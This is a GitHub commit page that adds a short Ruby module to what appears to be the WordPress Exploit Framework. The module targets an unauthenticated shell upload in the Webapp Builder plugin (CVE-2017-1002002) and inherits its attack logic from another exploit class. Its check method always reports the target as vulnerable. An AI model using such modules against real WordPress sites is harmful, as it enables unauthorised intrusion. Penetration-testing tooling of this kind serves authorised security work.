Skip to content
This repository was archived by the owner on Oct 22, 2020. It is now read-only.

Commit af70e00

Browse files
committed
Add Webapp Builder unauthenticated shell upload
1 parent 2f529e9 commit af70e00

File tree

1 file changed

+27
-0
lines changed

1 file changed

+27
-0
lines changed
Lines changed: 27 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,27 @@
1+
class Wpxf::Exploit::WebappBuilderShellUpload < Wpxf::Exploit::MobileAppNativeV3ShellUpload
2+
def initialize
3+
super
4+
5+
update_info(
6+
name: 'Webapp Builder <= 2.0 Unauthenticated Shell Upload',
7+
author: [
8+
'Larry W. Cashdollar', # Discovery and disclosure
9+
'Rob Carr <rob[at]rastating.com>' # WPXF module
10+
],
11+
references: [
12+
['WPVDB', '8773'],
13+
['CVE', '2017-1002002'],
14+
['URL', 'http://www.vapidlabs.com/advisory.php?v=182']
15+
],
16+
date: 'Mar 01 2017'
17+
)
18+
end
19+
20+
def check
21+
:vulnerable
22+
end
23+
24+
def plugin_name
25+
'webapp-builder'
26+
end
27+
end

0 commit comments

Comments
 (0)